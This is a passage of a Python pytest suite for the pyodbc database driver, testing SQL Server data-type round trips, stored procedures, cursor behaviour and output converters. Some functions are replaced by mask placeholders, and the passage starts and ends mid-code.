[None, -1, 0, 1, 12345678])\n\n\ndef test_bigint(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'bigint', [None, -1, 0, 1, 4886718345, 2147483647,\n 4294967295, 4886718345])\n\n\ndef test_overflow_int(cursor: pyodbc.Cursor):\n input = 9999999999999999999999999999999999999\n cursor.execute('create table t1(d bigint)')\n with pytest.raises(OverflowError):\n cursor.execute('insert into t1 values (?)', input)\n result = cursor.execute('select * from t1').fetchall()\n assert result == []\n\n\ndef test_float(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'float', [None, -200, -1, 0, 1, 1234.5, -200, \n 0.00012345])\n\n\ndef test_non_numeric_float(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(d float)')\n for input in (float('+Infinity'), float('-Infinity'), float('NaN')):\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('insert into t1 values (?)', input)\n\n\ndef test_drivers():\n p = pyodbc.drivers()\n assert isinstance(p, list)\n\n\ndef test_datasources():\n p = pyodbc.dataSources()\n assert isinstance(p, dict)\n\n\ndef test_getinfo_string():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CATALOG_NAME_SEPARATOR)\n assert isinstance(value, str)\n\n\ndef test_getinfo_bool():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_ACCESSIBLE_TABLES)\n assert isinstance(value, bool)\n\n\ndef test_getinfo_int():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_DEFAULT_TXN_ISOLATION)\n assert isinstance(value, int)\n\n\ndef test_getinfo_smallint():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CONCAT_NULL_BEHAVIOR)\n assert isinstance(value, int)\n\n\ndef test_no_fetch(cursor: pyodbc.Cursor):\n cursor.execute('select 1')\n cursor.execute('select 1')\n cursor.execute('select 1')\n\n\ndef test_decode_meta(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure column names with non-ASCII characters are converted using the configured encodings.\n \"\"\"\n cursor.execute('create table t1(a int)')\n cursor.execute('insert into t1 values (1)')\n cursor.execute('select a as \"Tipología\" from t1')\n assert cursor.description[0][0] == 'Tipología'\n\n\ndef test_exc_integrity(cursor: pyodbc.Cursor):\n \"\"\"Make sure an IntegretyError is raised\"\"\"\n 
cursor.execute('create table t1(s1 varchar(10) primary key)')\n cursor.execute(\"insert into t1 values ('one')\")\n with pytest.raises(pyodbc.IntegrityError):\n cursor.execute(\"insert into t1 values ('one')\")\n\n\ndef test_multiple_bindings(cursor: pyodbc.Cursor):\n \"\"\"More than one bind and select on a cursor\"\"\"\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (?)', 1)\n cursor.execute('insert into t1 values (?)', 2)\n cursor.execute('insert into t1 values (?)', 3)\n for _ in range(3):\n cursor.execute('select n from t1 where n < ?', 10)\n cursor.execute('select n from t1 where n < 3')\n\n\ndef test_different_bindings(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(n int)')\n cursor.execute('create table t2(d datetime)')\n cursor.execute('insert into t1 values (?)', 1)\n cursor.execute('insert into t2 values (?)', datetime.now())\n\n\n<mask token>\n\n\ndef _test_vartype(cursor: pyodbc.Cursor, datatype):\n if datatype == 'text':\n lengths = LARGE_FENCEPOST_SIZES\n else:\n lengths = SMALL_FENCEPOST_SIZES\n if datatype == 'text':\n cursor.execute(f'create table t1(c1 {datatype})')\n else:\n maxlen = lengths[-1]\n cursor.execute(f'create table t1(c1 {datatype}({maxlen}))')\n for length in lengths:\n cursor.execute('delete from t1')\n encoding = datatype in ('blob', 'varbinary') and 'utf8' or None\n value = _generate_str(length, encoding=encoding)\n try:\n cursor.execute('insert into t1 values(?)', value)\n except pyodbc.Error as ex:\n msg = f'{datatype} insert failed: length={length} len={len(value)}'\n raise Exception(msg) from ex\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\ndef _test_scalar(cursor: pyodbc.Cursor, datatype, values):\n \"\"\"\n A simple test wrapper for types that are identical when written and read.\n \"\"\"\n cursor.execute(f'create table t1(c1 {datatype})')\n for value in values:\n cursor.execute('delete from t1')\n cursor.execute('insert into t1 values (?)', value)\n v = cursor.execute('select c1 from t1').fetchone()[0]\n assert v == value\n\n\ndef test_noscan(cursor: pyodbc.Cursor):\n assert cursor.noscan is False\n cursor.noscan = True\n assert cursor.noscan is True\n\n\ndef test_nonnative_uuid(cursor: pyodbc.Cursor):\n value = uuid.uuid4()\n cursor.execute('create table t1(n uniqueidentifier)')\n cursor.execute('insert into t1 values (?)', value)\n pyodbc.native_uuid = False\n result = cursor.execute('select n from t1').fetchval()\n assert isinstance(result, str)\n assert result == str(value).upper()\n pyodbc.native_uuid = True\n\n\ndef test_native_uuid(cursor: pyodbc.Cursor):\n value = uuid.uuid4()\n cursor.execute('create table t1(n uniqueidentifier)')\n cursor.execute('insert into t1 values (?)', value)\n pyodbc.native_uuid = True\n result = cursor.execute('select n from t1').fetchval()\n assert isinstance(result, uuid.UUID)\n assert value == result\n\n\n<mask token>\n\n\[email protected](IS_FREEDTS, reason=\n 'https://github.com/FreeTDS/freetds/issues/230')\ndef test_nextset_with_raiserror(cursor: pyodbc.Cursor):\n cursor.execute(\"select i = 1; RAISERROR('c', 16, 1);\")\n row = next(cursor)\n assert 1 == row.i\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.nextset()\n\n\ndef test_fixed_unicode(cursor: pyodbc.Cursor):\n value = 'tësting'\n cursor.execute('create table t1(s nchar(7))')\n cursor.execute('insert into t1 values(?)', 'tësting')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert len(v) == len(value)\n assert v == 
value\n\n\ndef test_chinese(cursor: pyodbc.Cursor):\n v = '我的'\n cursor.execute(\"SELECT N'我的' AS [Name]\")\n row = cursor.fetchone()\n assert row[0] == v\n cursor.execute(\"SELECT N'我的' AS [Name]\")\n rows = cursor.fetchall()\n assert rows[0][0] == v\n\n\ndef test_bit(cursor: pyodbc.Cursor):\n value = True\n cursor.execute('create table t1(b bit)')\n cursor.execute('insert into t1 values (?)', value)\n v = cursor.execute('select b from t1').fetchone()[0]\n assert isinstance(v, bool)\n assert v == value\n\n\ndef test_decimal(cursor: pyodbc.Cursor):\n for precision, scale, negative in [(1, 0, False), (1, 0, True), (6, 0, \n False), (6, 2, False), (6, 4, True), (6, 6, True), (38, 0, False),\n (38, 10, False), (38, 38, False), (38, 0, True), (38, 10, True), (\n 38, 38, True)]:\n try:\n cursor.execute('drop table t1')\n except:\n pass\n cursor.execute(f'create table t1(d decimal({precision}, {scale}))')\n sign = negative and '-' or ''\n before = '9' * (precision - scale)\n after = scale and '.' + '9' * scale or ''\n decStr = f'{sign}{before}{after}'\n value = Decimal(decStr)\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select d from t1').fetchone()[0]\n assert v == value\n\n\ndef test_decimal_e(cursor: pyodbc.Cursor):\n \"\"\"Ensure exponential notation decimals are properly handled\"\"\"\n value = Decimal((0, (1, 2, 3), 5))\n cursor.execute('create table t1(d decimal(10, 2))')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select * from t1').fetchone()[0]\n assert result == value\n\n\n<mask token>\n\n\ndef test_close_cnxn():\n \"\"\"Make sure using a Cursor after closing its connection doesn't crash.\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('drop table if exists t1')\n cursor.execute('create table t1(id integer, s varchar(20))')\n cursor.execute('insert into t1 values (?,?)', 1, 'test')\n cursor.execute('select * from t1')\n cnxn.close()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('select * from t1')\n\n\ndef test_empty_string(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', '')\n\n\ndef test_empty_string_encoding():\n cnxn = connect()\n cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')\n value = ''\n cursor = cnxn.cursor()\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\ndef test_fixed_str(cursor: pyodbc.Cursor):\n value = 'testing'\n cursor.execute('create table t1(s char(7))')\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert len(v) == len(value)\n assert v == value\n\n\n<mask token>\n\n\ndef test_empty_unicode_encoding():\n cnxn = connect()\n cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')\n value = ''\n cursor = cnxn.cursor()\n cursor.execute('create table t1(s nvarchar(20))')\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\ndef test_negative_row_index(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', '1')\n row = cursor.execute('select * from t1').fetchone()\n assert row[0] == '1'\n assert row[-1] == '1'\n\n\ndef test_version():\n assert 3 == len(pyodbc.version.split('.'))\n\n\[email protected](IS_MSODBCSQL and 
SQLSERVER_YEAR < 2008, reason=\n 'Date not supported until 2008?')\ndef test_date(cursor: pyodbc.Cursor):\n value = date.today()\n cursor.execute('create table t1(d date)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select d from t1').fetchone()[0]\n assert isinstance(result, date)\n assert value == result\n\n\[email protected](IS_MSODBCSQL and SQLSERVER_YEAR < 2008, reason=\n 'Time not supported until 2008?')\ndef test_time(cursor: pyodbc.Cursor):\n value = datetime.now().time()\n value = value.replace(microsecond=0)\n cursor.execute('create table t1(t time)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select t from t1').fetchone()[0]\n assert isinstance(result, time)\n assert value == result\n\n\ndef test_datetime(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n cursor.execute('create table t1(dt datetime)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_datetime_fraction(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5, 123000)\n cursor.execute('create table t1(dt datetime)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_datetime_fraction_rounded(cursor: pyodbc.Cursor):\n full = datetime(2007, 1, 15, 3, 4, 5, 123456)\n rounded = datetime(2007, 1, 15, 3, 4, 5, 123000)\n cursor.execute('create table t1(dt datetime)')\n cursor.execute('insert into t1 values (?)', full)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert rounded == result\n\n\ndef test_datetime2(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n cursor.execute('create table t1(dt datetime2)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_sp_results(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n select top 10 name, id, xtype, refdate\n from sysobjects\n \"\"\"\n )\n rows = cursor.execute('exec proc1').fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_results_from_temp(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n select top 10 name, id, xtype, refdate\n into #tmptable\n from sysobjects\n\n select * from #tmptable\n \"\"\"\n )\n cursor.execute('exec proc1')\n assert cursor.description is not None\n assert len(cursor.description) == 4\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_results_from_vartbl(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n declare @tmptbl table(name varchar(100), id int, xtype varchar(4), refdate datetime)\n\n insert into @tmptbl\n select top 10 name, id, xtype, refdate\n from sysobjects\n\n select * from @tmptbl\n \"\"\"\n )\n cursor.execute('exec proc1')\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_with_dates(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n if exists (select 
* from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\"\n )\n cursor.execute(\n \"\"\"\n create procedure test_sp(@d1 datetime, @d2 datetime)\n AS\n declare @d as int\n set @d = datediff(year, @d1, @d2)\n select @d\n \"\"\"\n )\n cursor.execute('exec test_sp ?, ?', datetime.now(), datetime.now())\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] == 0\n\n\ndef test_sp_with_none(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\"\n )\n cursor.execute(\n \"\"\"\n create procedure test_sp(@x varchar(20))\n AS\n declare @y varchar(20)\n set @y = @x\n select @y\n \"\"\"\n )\n cursor.execute('exec test_sp ?', None)\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] is None\n\n\ndef test_rowcount_delete(cursor: pyodbc.Cursor):\n assert cursor.rowcount == -1\n cursor.execute('create table t1(i int)')\n count = 4\n for i in range(count):\n cursor.execute('insert into t1 values (?)', i)\n cursor.execute('delete from t1')\n assert cursor.rowcount == count\n\n\n<mask token>\n\n\ndef test_rowcount_select(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.rowcount is set properly after a select statement.\n\n pyodbc calls SQLRowCount after each execute and sets Cursor.rowcount, but SQL Server 2005\n returns -1 after a select statement, so we'll test for that behavior. This is valid\n behavior according to the DB API specification, but people don't seem to like it.\n \"\"\"\n cursor.execute('create table t1(i int)')\n count = 4\n for i in range(count):\n cursor.execute('insert into t1 values (?)', i)\n cursor.execute('select * from t1')\n assert cursor.rowcount == -1\n rows = cursor.fetchall()\n assert len(rows) == count\n assert cursor.rowcount == -1\n\n\n<mask token>\n\n\ndef test_retcursor_delete(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(i int)')\n cursor.execute('insert into t1 values (1)')\n v = cursor.execute('delete from t1')\n assert v == cursor\n\n\ndef test_retcursor_nodata(cursor: pyodbc.Cursor):\n \"\"\"\n This represents a different code path than a delete that deleted something.\n\n The return value is SQL_NO_DATA and code after it was causing an error. 
We could use\n SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount\n code.\n \"\"\"\n cursor.execute('create table t1(i int)')\n v = cursor.execute('delete from t1')\n assert v == cursor\n\n\ndef test_retcursor_select(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(i int)')\n cursor.execute('insert into t1 values (1)')\n v = cursor.execute('select * from t1')\n assert v == cursor\n\n\ndef table_with_spaces(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can select using [x z] syntax\"\"\"\n try:\n cursor.execute('create table [test one](int n)')\n cursor.execute('insert into [test one] values(1)')\n cursor.execute('select * from [test one]')\n v = cursor.fetchone()[0]\n assert v == 1\n finally:\n cursor.rollback()\n\n\ndef test_lower_case():\n \"\"\"Ensure pyodbc.lowercase forces returned column names to lowercase.\"\"\"\n try:\n pyodbc.lowercase = True\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(Abc int, dEf int)')\n cursor.execute('select * from t1')\n names = [t[0] for t in cursor.description]\n names.sort()\n assert names == ['abc', 'def']\n finally:\n pyodbc.lowercase = False\n\n\ndef test_row_description(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.description is accessible as Row.cursor_description.\n \"\"\"\n cursor.execute('create table t1(a int, b char(3))')\n cursor.execute(\"insert into t1 values(1, 'abc')\")\n row = cursor.execute('select * from t1').fetchone()\n assert cursor.description == row.cursor_description\n\n\ndef test_temp_select(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s char(7))')\n cursor.execute('insert into t1 values(?)', 'testing')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert v == 'testing'\n cursor.execute('select s into t2 from t1')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert v == 'testing'\n\n\ndef test_executemany(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b varchar(10))')\n params = [(i, str(i)) for i in range(1, 6)]\n cursor.executemany('insert into t1(a, b) values (?,?)', params)\n count = cursor.execute('select count(*) from t1').fetchone()[0]\n assert count == len(params)\n cursor.execute('select a, b from t1 order by a')\n rows = cursor.fetchall()\n assert count == len(rows)\n for param, row in zip(params, rows):\n assert param[0] == row[0]\n assert param[1] == row[1]\n\n\ndef test_executemany_one(cursor: pyodbc.Cursor):\n \"\"\"Pass executemany a single sequence\"\"\"\n cursor.execute('create table t1(a int, b varchar(10))')\n params = [(1, 'test')]\n cursor.executemany('insert into t1(a, b) values (?,?)', params)\n count = cursor.execute('select count(*) from t1').fetchone()[0]\n assert count == len(params)\n cursor.execute('select a, b from t1 order by a')\n rows = cursor.fetchall()\n assert count == len(rows)\n for param, row in zip(params, rows):\n assert param[0] == row[0]\n assert param[1] == row[1]\n\n\ndef test_executemany_dae_0(cursor: pyodbc.Cursor):\n \"\"\"\n DAE for 0-length value\n \"\"\"\n cursor.execute('create table t1(a nvarchar(max))')\n cursor.fast_executemany = True\n cursor.executemany('insert into t1(a) values(?)', [['']])\n assert cursor.execute('select a from t1').fetchone()[0] == ''\n cursor.fast_executemany = False\n\n\n<mask token>\n\n\ndef test_row_slicing(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b int, c int, d int)')\n cursor.execute('insert into t1 values(1,2,3,4)')\n row = 
cursor.execute('select * from t1').fetchone()\n result = row[:]\n assert result is row\n result = row[:-1]\n assert result == (1, 2, 3)\n result = row[0:4]\n assert result is row\n\n\ndef test_row_repr(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b int, c int, d varchar(50))')\n cursor.execute(\"insert into t1 values(1,2,3,'four')\")\n row = cursor.execute('select * from t1').fetchone()\n result = str(row)\n assert result == \"(1, 2, 3, 'four')\"\n result = str(row[:-1])\n assert result == '(1, 2, 3)'\n result = str(row[:1])\n assert result == '(1,)'\n\n\ndef test_concatenation(cursor: pyodbc.Cursor):\n v2 = '0123456789' * 30\n v3 = '9876543210' * 30\n cursor.execute(\n 'create table t1(c1 int identity(1, 1), c2 varchar(300), c3 varchar(300))'\n )\n cursor.execute('insert into t1(c2, c3) values (?,?)', v2, v3)\n row = cursor.execute('select c2, c3, c2 + c3 as both from t1').fetchone()\n assert row.both == v2 + v3\n\n\ndef test_view_select(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(c1 int identity(1, 1), c2 varchar(50))')\n for i in range(3):\n cursor.execute('insert into t1(c2) values (?)', f'string{i}')\n cursor.execute('create view t2 as select * from t1')\n cursor.execute('select * from t2')\n rows = cursor.fetchall()\n assert rows is not None\n assert len(rows) == 3\n\n\ndef test_autocommit():\n cnxn = connect()\n assert cnxn.autocommit is False\n cnxn = None\n cnxn = connect(autocommit=True)\n assert cnxn.autocommit is True\n cnxn.autocommit = False\n assert cnxn.autocommit is False\n\n\ndef test_sqlserver_callproc(cursor: pyodbc.Cursor):\n try:\n cursor.execute('drop procedure pyodbctest')\n cursor.commit()\n except:\n pass\n cursor.execute('create table t1(s varchar(10))')\n cursor.execute('insert into t1 values(?)', 'testing')\n cursor.execute(\n \"\"\"\n create procedure pyodbctest @var1 varchar(32)\n as\n begin\n select s from t1\n return\n end\n \"\"\"\n )\n cursor.execute(\"exec pyodbctest 'hi'\")\n\n\ndef test_skip(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(id int)')\n for i in range(1, 5):\n cursor.execute('insert into t1 values(?)', i)\n cursor.execute('select id from t1 order by id')\n assert cursor.fetchone()[0] == 1\n cursor.skip(2)\n assert cursor.fetchone()[0] == 4\n\n\ndef test_timeout():\n cnxn = connect()\n assert cnxn.timeout == 0\n cnxn.timeout = 30\n assert cnxn.timeout == 30\n cnxn.timeout = 0\n assert cnxn.timeout == 0\n\n\ndef test_sets_execute(cursor: pyodbc.Cursor):\n cursor.execute('create table t1 (word varchar (100))')\n words = {'a', 'b', 'c'}\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('insert into t1 (word) values (?)', words)\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.executemany('insert into t1 (word) values (?)', words)\n\n\ndef test_row_execute(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can use a Row object as a parameter to execute\"\"\"\n cursor.execute('create table t1(n int, s varchar(10))')\n cursor.execute(\"insert into t1 values (1, 'a')\")\n row = cursor.execute('select n, s from t1').fetchone()\n assert row\n cursor.execute('create table t2(n int, s varchar(10))')\n cursor.execute('insert into t2 values (?, ?)', row)\n\n\ndef test_row_executemany(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can use a Row object as a parameter to executemany\"\"\"\n cursor.execute('create table t1(n int, s varchar(10))')\n for i in range(3):\n cursor.execute('insert into t1 values (?, ?)', i, chr(ord('a') + i))\n rows = cursor.execute('select n, s from t1').fetchall()\n assert 
len(rows) != 0\n cursor.execute('create table t2(n int, s varchar(10))')\n cursor.executemany('insert into t2 values (?, ?)', rows)\n\n\ndef test_description(cursor: pyodbc.Cursor):\n \"\"\"Ensure cursor.description is correct\"\"\"\n cursor.execute('create table t1(n int, s varchar(8), d decimal(5,2))')\n cursor.execute(\"insert into t1 values (1, 'abc', '1.23')\")\n cursor.execute('select * from t1')\n t = cursor.description[0]\n assert t[0] == 'n'\n assert t[1] == int\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[1]\n assert t[0] == 's'\n assert t[1] == str\n assert t[4] == 8\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[2]\n assert t[0] == 'd'\n assert t[1] == Decimal\n assert t[4] == 5\n assert t[5] == 2\n assert t[6] is True\n\n\ndef test_cursor_messages_with_print(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure the Cursor.messages attribute is handled correctly with a simple PRINT statement.\n \"\"\"\n assert not cursor.messages\n for msg in ('hello world', 'ABCDEFGHIJ' * 800):\n cursor.execute(f\"PRINT '{msg}'\")\n messages = cursor.messages\n assert isinstance(messages, list)\n assert len(messages) == 1\n assert isinstance(messages[0], tuple)\n assert len(messages[0]) == 2\n assert isinstance(messages[0][0], str)\n assert isinstance(messages[0][1], str)\n assert '[01000] (0)' == messages[0][0]\n assert messages[0][1].endswith(msg)\n\n\ndef test_cursor_messages_with_stored_proc(cursor: pyodbc.Cursor):\n \"\"\"\n Complex scenario to test the Cursor.messages attribute.\n \"\"\"\n cursor.execute(\n \"\"\"\n create or alter procedure test_cursor_messages as\n begin\n set nocount on;\n print 'Message 1a';\n print 'Message 1b';\n select N'Field 1a' AS F UNION ALL SELECT N'Field 1b';\n select N'Field 2a' AS F UNION ALL SELECT N'Field 2b';\n print 'Message 2a';\n print 'Message 2b';\n end\n \"\"\"\n )\n cursor.execute('exec test_cursor_messages')\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 1a', 'Field 1b']\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 1a', 'Message 1b']\n assert cursor.nextset()\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 2a', 'Field 2b']\n assert not cursor.messages\n assert cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 2a', 'Message 2b']\n assert not cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n assert not cursor.messages\n\n\ndef test_none_param(cursor: pyodbc.Cursor):\n \"\"\"Ensure None can be used for params other than the first\"\"\"\n cursor.execute('create table t1(n int, blob varbinary(max))')\n cursor.execute('insert into t1 values (1, newid())')\n row = cursor.execute('select * from t1').fetchone()\n assert row.n == 1\n assert isinstance(row.blob, bytes)\n sql = 'update t1 set n=?, blob=?'\n try:\n cursor.execute(sql, 2, None)\n except pyodbc.DataError:\n if IS_FREEDTS:\n cursor.setinputsizes([(), (pyodbc.SQL_VARBINARY, None, None)])\n cursor.execute(sql, 2, None)\n else:\n raise\n row = cursor.execute('select * from t1').fetchone()\n assert row.n == 2\n assert row.blob is None\n\n\ndef test_output_conversion():\n\n def convert1(value):\n return 'X' + value.decode('latin1') + 'X'\n\n def convert2(value):\n return 'Y' + value.decode('latin1') + 'Y'\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create 
table t1(n int, v varchar(10))')\n cursor.execute(\"insert into t1 values (1, '123.45')\")\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.clear_output_converters()\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.remove_output_converter(pyodbc.SQL_VARCHAR)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, None)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is not None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.clear_output_converters()\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n\n\ndef test_too_large(cursor: pyodbc.Cursor):\n \"\"\"Ensure error raised if insert fails due to truncation\"\"\"\n value = 'x' * 1000\n cursor.execute('create table t1(s varchar(800))')\n with pytest.raises(pyodbc.Error):\n cursor.execute('insert into t1 values (?)', value)\n\n\ndef test_row_equal(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(n int, s varchar(20))')\n cursor.execute(\"insert into t1 values (1, 'test')\")\n row1 = cursor.execute('select n, s from t1').fetchone()\n row2 = cursor.execute('select n, s from t1').fetchone()\n assert row1 == row2\n\n\ndef test_row_gtlt(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(n int, s varchar(20))')\n cursor.execute(\"insert into t1 values (1, 'test1')\")\n cursor.execute(\"insert into t1 values (1, 'test2')\")\n rows = cursor.execute('select n, s from t1 order by s').fetchall()\n assert rows[0] < rows[1]\n assert rows[0] <= rows[1]\n assert rows[1] > rows[0]\n assert rows[1] >= rows[0]\n assert rows[0] != rows[1]\n rows = list(rows)\n rows.sort()\n\n\ndef test_context_manager_success():\n \"\"\"Ensure `with` commits if an exception is not raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cnxn.commit()\n with cnxn:\n cursor.execute('insert into t1 values (1)')\n rows = cursor.execute('select n from t1').fetchall()\n assert len(rows) == 1\n assert rows[0][0] == 1\n\n\ndef test_context_manager_failure(cursor: pyodbc.Cursor):\n \"\"\"Ensure `with` rolls back if an exception is raised\"\"\"\n cnxn = connect()\n cursor = 
cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (1)')\n cnxn.commit()\n with pytest.raises(pyodbc.Error):\n with cnxn:\n cursor.execute('insert into t1 values (2)')\n cursor.execute('delete from bogus')\n cursor.execute('select max(n) from t1')\n val = cursor.fetchval()\n assert val == 1\n\n\ndef test_untyped_none(cursor: pyodbc.Cursor):\n value = cursor.execute('select ?', None).fetchone()[0]\n assert value is None\n\n\ndef test_large_update_nodata(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a varbinary(max))')\n hundredkb = b'x' * 100 * 1024\n cursor.execute('update t1 set a=? where 1=0', (hundredkb,))\n\n\ndef test_func_param(cursor: pyodbc.Cursor):\n try:\n cursor.execute('drop function func1')\n except:\n pass\n cursor.execute(\n \"\"\"\n create function func1 (@testparam varchar(4))\n returns @rettest table (param varchar(4))\n as\n begin\n insert @rettest\n select @testparam\n return\n end\n \"\"\"\n )\n cursor.commit()\n value = cursor.execute('select * from func1(?)', 'test').fetchone()[0]\n assert value == 'test'\n\n\ndef test_columns(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b varchar(3), xΏz varchar(4))')\n cursor.columns('t1')\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = 